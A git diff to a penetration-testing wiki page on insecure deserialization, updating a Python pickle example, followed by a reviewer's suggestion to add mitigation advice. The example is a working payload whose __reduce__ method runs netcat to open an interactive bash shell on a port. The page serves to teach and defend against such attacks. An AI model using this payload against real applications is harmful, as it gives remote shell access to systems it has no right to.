diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
index 2842cd994..3b5882239 100644
--- a/pentesting-web/deserialization/README.md
+++ b/pentesting-web/deserialization/README.md
@@ -85,11 +85,11 @@ When the object gets unpickle, the function _\_\_reduce\_\__ will be executed. When exploited, server could return an error.
 ```python
-import cPickle, os, base64
+import pickle, os, base64
 class P(object):
 def __reduce__(self):
 return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
-print(base64.b64encode(cPickle.dumps(P())))
+print(base64.b64encode(pickle.dumps(P())))
 ```
 ## NodeJS
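Review bot: The ported example still ends at the closing fence with no defensive counterpart: nothing in the hunk says which code is exposed or how to close the hole. I would add one line before `## NodeJS`, for example `Only applications that call pickle.loads() or pickle.load() on data a client can influence are affected; prefer a data-only format such as JSON, or verify an HMAC over the blob before unpickling.` For triage it is also worth noting that `pickletools.dis()` disassembles a suspicious blob without executing it. The rest of the section lies outside the hunk, so this may already be covered elsewhere in the file.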